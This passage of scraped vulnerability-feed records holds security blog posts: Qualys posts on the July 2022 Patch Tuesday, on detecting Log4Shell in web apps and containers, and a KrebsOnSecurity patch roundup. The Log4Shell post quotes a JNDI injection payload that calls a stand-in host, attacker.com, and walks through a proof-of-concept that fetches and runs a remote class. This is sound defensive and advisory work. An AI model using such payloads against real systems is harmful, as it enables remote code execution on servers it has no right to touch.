execution and memory leak. \n\n* * *\n\n* * *\n\n# Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its KnowledgeBase (KB). \n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:( qid:`91921` OR qid:`91922` OR qid:`91923` OR qid:`91924` OR qid:`91927` OR qid:`110411` OR qid:`110412` OR qid:`376725` ) \n\n![](https://blog.qualys.com/wp-content/uploads/2022/07/2022-07-VMDR-1-1070x451.png)\n\n* * *\n\n# Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches for this Patch Tuesday:\n \n \n ( qid:`91921` OR qid:`91922` OR qid:`91923` OR qid:`91924` OR qid:`91927` OR qid:`110411` OR qid:`110412` OR qid:`376725` ) \n\n![](https://blog.qualys.com/wp-content/uploads/2022/07/2022-07-Patch-1070x451.png)\n\n![](https://blog.qualys.com/wp-content/uploads/2022/06/image-4.png) [Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)\n\n* * *\n\n# Qualys Monthly Webinar Series \n\n![This image has an empty alt attribute; its file name is image-1070x560.jpeg](https://blog.qualys.com/wp-content/uploads/2022/03/image-1070x560.jpeg)\n\nThe Qualys Research team hosts a monthly webinar series to help our existing customers leverage the seamless integration between Qualys[ Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and Qualys [Patch Management](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities. \n\nDuring the webcast, we will discuss this month\u2019s high-impact vulnerabilities, including those that are part of this month's Patch Tuesday alert. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Qualys Patch Management. \n\n* * *\n\n### **Join the webinar**\n\n## **This Month in Vulnerabilities & Patches**\n\n[Register Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-12T20:09:23", "type": "qualysblog", "title": "July 2022 Patch Tuesday | Microsoft Releases 84 Vulnerabilities with 4 Critical, plus 2 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 27 Vulnerabilities with 18 Critical.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-30190", "CVE-2022-30221"], "modified": "2022-07-12T20:09:23", "id": "QUALYSBLOG:65C282BB0F312A3AD8A043024FD3D866", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-04T10:37:30", "description": "On December 09, 2021, a critical remote code execution vulnerability was identified in Apache Log4j2 after proof-of-concepts were leaked publicly, affecting Apache Log4j 2.x <= 2.15.0-rc1. The vulnerability is being tracked as CVE-2021-44228 with CVSSv3 10 score and affects numerous applications which are using the Log4j2 library.\n\nSuccessful exploitation of this vulnerability could allow a remote attacker to download and execute arbitrary code on the target system. With the vulnerability being actively exploited in the wild, considering the gravity of the situation, [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) has released **QID 150440**, **150441** which sends specially crafted requests to the target server to detect vulnerable web application instances using the Log4j2 library. Once successfully detected, users can remediate the vulnerability by upgrading to **Apache Log4j** **2.17.1**.\n\nOn December 14, 2021, [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>) was published to address the deficiencies in CVE-2021-44228. Later it was also identified that under non-default configuration Apache Log4j 2.15.0 could allow an attacker to exfiltrate data and achieve remote code execution (RCE). Qualys WAS team is working on improvements to our detections.\n\nOn December 27, 2021, **[Log4j 2.17.1](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.17.1>)** was released to patch a new arbitrary code execution vulnerability discovered in version 2.17.0. The vulnerability is tracked as [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) and affects versions 2.0-alpha7 to 2.17.0 excluding security fix releases 2.3.2 and 2.12.4.\n\n### About CVE-2021-44228\n\nApache Log4j is an extremely popular java library used by application developers to log data, this logging functionality helps with debugging issues and security incidents. The logged untrusted data could be errors such as exception traces, authentication failures, and other unpredicted vectors of user input. If the data contains a certain payload, the JNDI lookup method triggers and executes arbitrary code from attacker-controlled servers leading to Remote Code Execution Vulnerability.\n\n#### Vulnerability analysis\n\nIn Log4j2 the [lookups](<https://logging.apache.org/log4j/log4j-2.3/manual/lookups.html>) functionality gives the user the ability to add values to the configuration at arbitrary places with ease of maintaining the format. There are multiple lookup methods such as Map Lookup, Environment Lookup, Context Map Lookup, etc.\n\nThe vulnerability was introduced in Log4j2 version 2.0-beta9 when the \u201cJNDILookup plugin\u201d was added as part of lookup methods to the [library](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.0-beta9>). As per official [documentation](<https://logging.apache.org/log4j/log4j-2.3/manual/lookups.html#JndiLookup>):\n\n**_"The JndiLookup allows variables to be retrieved via JNDI. By default, the key will be prefixed with java:comp/env/, however, if the key contains a ":" no prefix will be added."_**\n\nJNDI which stands for \u201cJava Naming and Directory Interface\u201d is a Java API which allows Java applications to perform look-ups and retrieve Java objects using protocols such as LDAP, RMI, DNS, etc. This JNDI lookup allows a developer to retrieve DataSource objects and enhance the data which is being logged by the log4j library.\n\n#### JNDI Injection\n\nOn vulnerable instances of Log4j2, any data that is being logged can trigger the application to reach out to attacker-controlled servers.\n\nAs the attack vectors are not limited to specific injection points, attackers can test the vulnerability by injecting malicious JNDI lookup payloads inside HTTP request headers or via POST request form fields such as username, email, password, etc. to test this vulnerability using:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/Screenshot-2021-12-15-at-6.42.13-PM.png)\n\nWhere vulnerable instances will parse the above payload and reach out to malicious LDAP server attacker.com via JNDI lookup method to execute the `rce_class`.\n\nIt is safe to say that the vulnerability is present in the environment due to an improper input validation vulnerability. On any new log entry if log4j encounters a JNDI lookup string starting with `${jndi:protocol://`, it will try to parse it and thereafter perform the lookup action to resolve the required variable and eventually fetch and execute the malicious `rce_class`.\n\n### Remote Code Execution POC:\n\nQualys WAS team was able to exploit the vulnerability successfully on a vulnerable instance of Log4j, below is the POC to demonstrate how attackers are exploiting this vulnerability in the real world:\n\n##### **Vulnerable application code :**\n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/c1.png)\n\nFirst, the attacker injects the JNDI payload into the vulnerable application, once the input is logged by log4j, it will parse the text and try to resolve it.\n\n##### Stage one : LDAP referrer\n\nThe above payload supplied by the attacker is using LDAP protocol. The log4j library on encountering this string will make a LDAP query to the target LDAP server running on `127.0.0.1:1389`\n\nNext, the attacker uses [marshalsec](<https://github.com/mbechler/marshalsec>) package to setup a LDAP referrer that accepts incoming JNDI lookup request and creates a redirection to an HTTP server hosting the malicious class (Exploit.class) as show below:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/c2.png)\n\n##### Stage two: Hosting malicious class\n\nHere, an HTTP server is hosting a malicious Java class which will execute a command to open a calculator application on the target server.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/c4.png)\n\nFinally, the malicious class is download and executed leading to remote code execution.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/c3.png)\n\n### Detecting the Vulnerability with Qualys WAS\n\nCustomers can detect Apache Log4j Remote Code Execution vulnerability (CVE-2021-44228) with Qualys Web Application Scanning using **QID 150440**, **150441**:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/KB.png)QID 150440 - Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228)\n\nThe WAS module injects JNDI payload into the headers listed below, application specific vulnerable endpoints and uses Out Of Band (OOB) detection mechanism where vulnerable instances will make a callback DNS query that will trigger Qualys Periscope detection mechanism :\n\n 1. X-Api-Version\n 2. User-Agent\n 3. Referer\n 4. X-Druid-Comment\n 5. Origin\n 6. Location\n 7. X-Forwarded-For\n 8. Cookie\n 9. X-Requested-With\n 10. X-Forwarded-Host\n 11. Accept\n 12. Authentication\n 13. Authorization\n\nVulnerable Applications detection covered under QID 150440:\n\n 1. Apache Struts2\n 2. Apache Solr\n 3. Apache Druid\n 4. Apache OFBiz\n 5. Apache JSPWiki\n\nQualys WAS OOB service uses unique DNS payload on every request which makes the detection mechanism accurate in identifying the vulnerability.\n\n### WAS Log4Shell Detection Methodology with Qualys Periscope\n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-14-at-8.55.27-PM.png)\n\nWhen WAS tests a web application for the Log4Shell vulnerability, the following steps are performed:\n\n 1. WAS makes multiple requests with specially crafted payloads in the request header fields listed above. For example, the 'User-Agent' here has been modified to include a specific payload to Qualys Periscope:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/Screenshot-2021-12-15-at-6.44.37-PM.png)\n\n 2. If the scanned application is vulnerable to Log4Shell, it will attempt to connect to the address in the modified request header. However, it must first resolve the FQDN for the domain qualysperiscope.com shown in the payload.\n 3. As part of the DNS resolution process:\n 1. The request is received by the Qualys Periscope DNS service.\n 2. The DNS service processes the request to verify the hash embedded in the request is valid. This ensures the lookup request is genuine and was generated by a WAS scan.\n 3. If the hash is verified, Periscope logs the request internally.\n 4. If verification fails, the request is dropped.\n 4. WAS then queries Periscope with the lookup request data along with the scan ID and hash for each of the injected request header payloads.\n 1. Periscope verifies the hash from WAS and either:\n 1. Matches the WAS query against a logged lookup request from the web application - the site is vulnerable to Log4Shell.\n 2. Fails to match the WAS query against a logged lookup request from the web application - the site is not vulnerable.\n 5. WAS processes the data received from Qualys Periscope, and reports any vulnerabilities corresponding to payloads which were successfully executed.\n\n### Scan Configurations :\n\nQID 150440 has been added to the WAS Core Detection Scope, so all scans using the Core detection will include this QID in scanning. However, to expedite testing for CVE-2021-44228 across all of your web applications, it is recommended that you create a new scanning Option Profile to limit testing to only this specific vulnerability. This can be done by creating a new Option Profile and selecting \u201cCustom Search Lists\u201d under the Detection Scope to create a new static list.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/Outlook-xvkjcqva-1.png)\n\nComplete the creation wizard and add QID 150440 to the Static Search List.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/Outlook-xfmifyzd-1.png)\n\nOptionally you can add Information Gathered (IG) QIDs for confirmation of links crawled, scan diagnostics, etc. IG QIDs will not significantly impact the efficiency of the scan.\n \n \n IG QIDs: 6 ,38116 ,38291 ,38597 ,38600 ,38609 ,38704 ,38706 ,38717 ,38718 ,42350 ,45017 ,45038 ,45218 ,86002 ,90195 ,150005 ,150006 ,150007 ,150008 ,150009 ,150010 ,150014 ,150015 ,150016 ,150017 ,150018 ,150019 ,150020 ,150021 ,150024 ,150025 ,150026 ,150028 ,150029 ,150030 ,150032 ,150033 ,150034 ,150035 ,150036 ,150037 ,150038 ,150039 ,150040 ,150041 ,150042 ,150043 ,150044 ,150045 ,150054 ,150058 ,150061 ,150065 ,150066 ,150067 ,150077 ,150078 ,150080 ,150082 ,150083 ,150086 ,150087 ,150089 ,150094 ,150095 ,150097 ,150099 ,150100 ,150101 ,150104 ,150105 ,150106 ,150111 ,150115 ,150116 ,150125 ,150126 ,150135 ,150140 ,150141 ,150142 ,150143 ,150148 ,150152 ,150157 ,150164 ,150167 ,150168 ,150169 ,150170 ,150172 ,150176 ,150177 ,150182 ,150183 ,150184 ,150185 ,150186 ,150194 ,150195 ,150197 ,150202 ,150203 ,150204 ,150205 ,150206 ,150208 ,150210 ,150244 ,150245 ,150247 ,150257 ,150261 ,150262 ,150265 ,150277 ,150291 ,150292 ,150308 ,150325 ,150344 ,150345 ,150348 ,150350 ,150351 ,150352\n\nWe recommend limiting the scan to between 50 and 100 links in scope maximum.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/Outlook-fivv5vfx-1.png)\n\nAdditionally, configure the scan to be launched at "Maximum" Performance for faster scan completion.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-14-at-3.52.59-PM-1.png)\n\nScanning with the above mentioned scan configurations will achieve two things to expedite testing your web applications in the most efficient way possible. First, we are only testing for one specific vulnerability, QID 150440. Second, as this vulnerability is only tested at the base URI and several directories up and down as appropriate, there is no need to crawl and test every link in the application. These two changes will allow each web application to be scanned faster than full Core detection scans while still providing you the necessary visibility of any vulnerable versions of Log4j2.\n\n#### Report : 150440\n\nOnce the vulnerability is successfully detected, users shall see similar kind of results for QID 150440 in the vulnerability scan report:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/r1.png)\n\nAs you can see in the above report, the payload is injected inside **User-Agent** request header and makes a DNS lookup request to the Qualys Periscope detection mechanism.\n\nQualys WAS has released QID 150441 - Forms Vulnerable to Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228), which injects JNDI payloads into every user input form field ex. (username, email, password) which makes it more reliable and efficient detection in comparison to open source scanning scripts written in Python and Golang which have limited scanning capability.\n\nAfter injecting JNDI payloads into every form field, the vulnerable application makes a DNS lookup request to Qualys Periscope mechanism:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/kb41.jpg)QID 150441 - Forms Vulnerable to Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228)\n\n#### Report : 150441\n\nOn successful detection, users shall see similar results in vulnerability scan report:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/newreport.png)\n\nIn the above report we can see, specially crafted payload was sent via HTTP POST request to uname parameter of the application login form, which then makes a DNS lookup request to the Qualys Periscope detection mechanism.\n\n### About CVE-2021-45046\n\nApache Log4j 2.15.0 was released to address CVE-2021-44228 but it turned out that the fix was incomplete in certain non-default configuration setup. In CVE-2021-45046, security measures were added to version 2.15.0 to prevent remote code execution by restricting JNDI LDAP lookups to localhost by default, i.e., a remote connection to `attacker.com` will be blocked in `${jndi:ldap://attacker.com` payload.\n\nAccording to [Apache Security advisory](<https://logging.apache.org/log4j/2.x/security.html>) when the logging configuration uses non-default pattern layout with a [Context Lookup](<https://logging.apache.org/log4j/2.x/manual/lookups.html#ContextMapLookup>) value ex. `$${ctx:loginId-value}`, attackers with control over [Thread Context Map](<https://logging.apache.org/log4j/2.x/manual/thread-context.html>) (Mapped Diagnostic Context or MDC) input data can craft malicious input data using a JNDI Lookup pattern which would allow data exfiltration and remote code execution in certain scenarios.\n\n### About CVE-2021-44832\n\nThe arbitrary code execution vulnerability discovered in version 2.17.0 affects Log4j2 instances when an attacker with permission to modify the logging configuration can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.\n\nThe Qualys WAS research team is constantly working to find more attack vectors and will update the signatures accordingly. We are also working on detecting the vulnerability affecting applications using Log4j logging utility and will update new QIDs as needed.\n\n### Solution\n\nIt is strongly recommended to upgrade to the latest **Apache Log4j 2.17.1** to remediate these vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832). According to [Apache Security Advisory](<https://logging.apache.org/log4j/2.x/security.html>) version 2.17.1 also remediates DoS vulnerability (CVE-2021-45105) which was present in version 2.16.0.\n\nRelease details Apache Log4j 2.17.1 : https://logging.apache.org/log4j/2.x/changes-report.html#a2.17.1\n\nIn cases where upgrading the version is not possible, we recommend applying the following mitigation guidelines:\n\n * **For Log4j 1.x** : Applications using Log4j 1.x are only vulnerable to CVE-2021-44228 when they use JNDI in their configuration. CVE-2021-4104 has been filed to track this vulnerability and can be mitigated by auditing logging configuration to ensure it has no JMSAppender configured.\n * **For Log4j 2.x** : Implement one of the mitigation techniques below :\n * Upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).\n * In prior releases confirm that if the JDBC Appender is being used, it is not configured to use any protocol other than Java.\n * Remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.\n\nFor latest updates on solution and mitigation guidelines, please refer to [Apache Log4j security advisory](<https://logging.apache.org/log4j/2.x/security.html>)\n\n### Credits\n\n**Apache Security Advisory**: <https://logging.apache.org/log4j/2.x/security.html>\n\n**CVE Details**:\n\n * <https://nvd.nist.gov/vuln/detail/CVE-2021-44228>\n * <https://nvd.nist.gov/vuln/detail/CVE-2021-45046>\n * <https://nvd.nist.gov/vuln/detail/CVE-2021-44832>\n\n**Credits for the vulnerability discovery go to:**\n\n * Chen Zhaojun of Alibaba Cloud Security Team.\n * Kai Mindermann of iC Consult and separately by 4ra1n\n\n### References:\n\n * <https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce>\n * <https://y4y.space/2021/12/10/log4j-analysis-more-jndi-injection/>\n * <https://www.lunasec.io/docs/blog/log4j-zero-day/>\n * <https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>\n\n### Contributors\n\n * **Sheela Sarva**, Director, Quality Engineering, Web Application Security, Qualys\n * **John Delaroderie**, Director, Product Management, Web App Security, Qualys\n\nPlease contact [John Delaroderie](<mailto:jdelaroderie@qualys.com>) if you need further information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T17:06:36", "type": "qualysblog", "title": "Is Your Web Application Exploitable By Log4Shell Vulnerability?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-15T17:06:36", "id": "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T20:37:20", "description": "If you run Java applications in containers, then it is critical that you check for Log4Shell vulnerabilities, given the high severity of this potential exploit. Qualys Container Security offers multiple methods to help you detect Log4Shell in your container environment. The Container Security sensor checks both running containers and container images for the following vulnerabilities: \n\n * QID 376157/[CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \u2013 Detect venerable log4 jar for versions at or below 2.14 \n * QID 376178/[CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) - Detect venerable log4 jar for versions at or below 2.15 \n * QID 376194/[CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) - Detect venerable log4 jar for versions at or below 2.16 \n\nQualys highly recommends running a vulnerability scan against all your running containers because Java applications running the container are susceptible to Log4Shell vulnerability exploits. To detect vulnerabilities in running containers, you must deploy the Container Security sensor in "General" mode on the hosts running the containers. The sensor will scan each running container on the host looking for a running Java process, and then check whether that process has the log4j jar file loaded. If the log4j jar is loaded, it will check for the version of the log4j and, if it is venerable, it will report it. \n\nTo see all the containers impacted by these vulnerabilities, navigate to the "Container Security" application, then select the "Assets-> Container" tab, and use the following QQL query: \n \n \n vulnerabilities.qid:376157 or vulnerabilities.qid:376178 or vulnerabilities.qid:376194 \n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/screenshot2-1070x617.jpg)\n\nTo view details of the vulnerability, you can click on the vulnerable container and navigate to the "Vulnerabilities" tab as shown in the screenshot below: \n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/screenshot1-1070x539.jpg)\n\nIn addition to scanning running containers, Qualys recommends that you scan container images for Log4Shell vulnerabilities. \n\nCatching and remediating Log4Shell vulnerabilities in container images will eliminate exposure to the vulnerabilities when the image is instantiated as a container. To detect Log4Shell vulnerabilities in container images, you will need to run the Container Security sensor version 1.10.1 or greater in any of the supported modes. The Container Security sensor will look for all the jar files in the image, searching for the log4j jar. If the log4j jar is not in the list of the jar files, it will then look inside each of the jar files. If it detects a vulnerable version, then it will report any/all instances. \n\nTo view all the impacted images, navigate to the Qualys Container Security app, then select the "Assets-> Images" tab, and use the following QQL query: \n \n \n vulnerabilities.qid:376157 or vulnerabilities.qid:376178 or vulnerabilities.qid:376194 \n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/screenshot4-1070x453.jpg)\n\nTo view details of the vulnerability, you can click on the image and navigate to the "Vulnerabilities" tab as shown in the screenshot below: \n\n![](https://blog.qualys.com/wp-content/uploads/2021/12/screenshot3-1070x779.jpg)\n\nQualys Container Security offers a comprehensive solution for detecting vulnerabilities, including Log4Shell, across the entire lifecycle of the container from build time to runtime. Check back periodically to our Log4Shell Resources page for the latest threat intelligence for container security.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T19:39:34", "type": "qualysblog", "title": "How to Discover Log4Shell Vulnerabilities in Running Containers & Images", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-27T19:39:34", "id": "QUALYSBLOG:6C71B912ABF74BE51F014EC90669CF30", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2022-07-16T21:59:04", "description": "**Microsoft** today released updates to fix at least 86 security vulnerabilities in its **Windows** operating systems and other software, including a weakness in all supported versions of Windows that Microsoft warns is actively being exploited. The software giant also has made a controversial decision to put the brakes on a plan to block **macros** in **Office** documents downloaded from the Internet.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2022/07/winupdatedate.png)\n\nIn February, security experts hailed Microsoft's decision to block VBA macros in all documents downloaded from the Internet. The company said it would roll out the changes in stages between April and June 2022.\n\nMacros have long been a trusted way for cybercrooks to trick people into running malicious code. Microsoft Office by default warns users that enabling macros in untrusted documents is a security risk, but those warnings can be easily disabled with the click of button. Under Microsoft's plan, the new warnings provided no such way to enable the macros.\n\nAs _Ars Technica_ veteran reporter **Dan Goodin** [put it](<https://arstechnica.com/information-technology/2022/07/microsoft-makes-major-course-reversal-allows-office-to-run-untrusted-macros/>), "security professionals\u2014some who have spent the past two decades watching clients and employees get infected with ransomware, wipers, and espionage with frustrating regularity\u2014cheered the change."\n\nBut last week, Microsoft abruptly changed course. As [first reported](<https://www.bleepingcomputer.com/news/microsoft/microsoft-rolls-back-decision-to-block-office-macros-by-default/>) by _BleepingComputer_, Redmond said it would roll back the changes based on feedback from users.\n\n"While Microsoft has not shared the negative feedback that led to the rollback of this change, users have reported that they are unable to find the Unblock button to remove the Mark-of-the-Web from downloaded files, making it impossible to enable macros," Bleeping's **Sergiu Gatlan** wrote.\n\nMicrosoft later said the decision to roll back turning off macros by default was temporary, although it has not indicated when this important change might be made for good.\n\nThe zero-day Windows vulnerability already seeing active attacks is [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), which is an elevation of privilege vulnerability in all supported versions of Windows. Trend Micro's **Zero Day Initiative** notes that while this bug is listed as being under active attack, there\u2019s no information from Microsoft on where or how widely it is being exploited.\n\n"The vulnerability allows an attacker to execute code as SYSTEM, provided they can execute other code on the target," ZDI's Dustin Childs [wrote](<https://www.zerodayinitiative.com/blog/2022/7/12/the-july-2022-security-update-review>). "Bugs of this type are typically paired with a code execution bug, usually a specially crafted Office or Adobe document, to take over a system. These attacks often rely on macros, which is why so many were disheartened to hear Microsoft\u2019s delay in blocking all Office macros by default."\n\n**Kevin Breen**, director of cyber threat research at **Immersive Labs**, said CVE-2022-22047 is the kind of vulnerability that is typically seen abused after a target has already been compromised.\n\n"Crucially, it allows the attacker to escalate their permissions from that of a normal user to the same permissions as the SYSTEM," he said. "With this level of access, the attackers are able to disable local services such as Endpoint Detection and Security tools. With SYSTEM access they can also deploy tools like Mimikatz which can be used to recover even more admin and domain level accounts, spreading the threat quickly."\n\nAfter a brief reprieve from patching serious security problems in the **Windows Print Spooler** service, we are back to business as usual. July's patch batch contains fixes for four separate elevation of privilege vulnerabilities in Windows Print Spooler, identified as [CVE-2022-22022](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22022>), [CVE-2022-22041](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22041>), [CVE-2022-30206](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30206>), and [CVE-2022-30226](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30226>). Experts at security firm **Tenable** note that these four flaws provide attackers with the ability to delete files or gain SYSTEM level privileges on a vulnerable system.\n\nRoughly a third of the patches issued today involve weaknesses in Microsoft's Azure Site Recovery offering. Other components seeing updates this month include **Microsoft Defender for Endpoint**; **Microsoft Edge** (Chromium-based); **Office**; **Windows BitLocker**; **Windows Hyper-V**; **Skype for Business** and **Microsoft Lync**; and **Xbox**.\n\nFour of the flaws fixed this month address vulnerabilities Microsoft rates "critical," meaning they could be used by malware or malcontents to assume remote control over unpatched Windows systems, usually without any help from users. [CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) and [CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>) affect Network File System (NFS) servers, and [CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>) affects the Remote Procedure Call (RPC) runtime.\n\n"Although all three of these will be relatively tricky for attackers to exploit due to the amount of sustained data that needs to be transmitted, administrators should patch sooner rather than later," said **Greg Wiseman**, product manager at **Rapid7**. "[CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>) supposedly affects the Windows Graphics Component, though Microsoft\u2019s FAQ indicates that exploitation requires users to access a malicious RDP server."\n\nSeparately, Adobe today [issued patches](<https://helpx.adobe.com/security.html>) to address at least 27 vulnerabilities across multiple products, including **Acrobat** and **Reader**, **Photoshop**, **RoboHelp**, and **Adobe Character Animator**.\n\nFor a closer look at the patches released by Microsoft today and indexed by severity and other metrics, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft%20July%202022%20Patch%20Tuesday/28838/>) from the **SANS Internet Storm Center**. And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/>) usually has the lowdown on any patches that may be causing problems for Windows users.\n\nAs always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these updates, please drop a note about it here in the comments.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": 